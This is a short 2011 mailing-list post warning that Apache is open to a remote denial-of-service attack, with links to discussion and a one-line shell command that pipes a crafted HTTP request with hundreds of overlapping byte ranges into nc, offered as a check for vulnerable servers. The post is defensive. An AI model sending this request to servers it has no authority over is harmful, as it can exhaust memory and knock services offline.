[Phpwm] Apache DoS vulnerability
David Goodwin
david at codepoets.co.uk
Thu Aug 25 08:37:29 UTC 2011
It appears Apache is vulnerable to a remote denial of service request.
There is some discussion and fixes on https://lwn.net/Articles/456268/
I've seen the following posted which might be useful in identifying vulnerable servers -
/bin/echo -en "HEAD / HTTP/1.1\r\nHost:localhost\r\nRange:bytes=0-,$(perl -e 'for ($i=1;$i<1300;$i++) { print "5-$i,"; }')5-1300\r\nAccept-Encoding:gzip\r\nConnection:close\r\n\r\n" | nc localhost 80
If the response size is ~90k you're vulnerable. (via: http://seclists.org/fulldisclosure/2011/Aug/175)
David.